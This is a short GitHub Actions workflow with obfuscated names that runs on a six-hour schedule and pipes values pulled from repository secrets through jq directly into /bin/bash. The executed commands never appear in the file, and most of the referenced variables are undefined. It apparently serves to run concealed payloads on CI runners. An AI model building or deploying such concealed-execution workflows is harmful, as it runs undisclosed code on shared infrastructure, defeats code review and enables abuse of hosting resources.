name: baixiaochi1974
on:
  workflow_dispatch:
  schedule:
    - cron: '31 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: baixiaochi1974
        env:
          yvbn065: ${{ secrets.yvbn065 }}
        run: |
          echo $yvbn065 | jq -r .oifzw312 | /bin/bash
          echo $jhhx3887 | jq -r .le2964 | /bin/bash
          echo $sutey210 | jq -r .rmy1115 | /bin/bash
          echo $ss55512 | jq -r .hf549 | /bin/bash
          echo $mpn59676 | jq -r .z96778 | /bin/bash
          echo $wygjr76 | jq -r .vaegy81 | /bin/bash
          echo $yrm33 | jq -r .uqjl4874 | /bin/bash
          echo $p921 | jq -r .cum91525 | /bin/bash
          echo $cp14837 | jq -r .hzp408 | /bin/bash

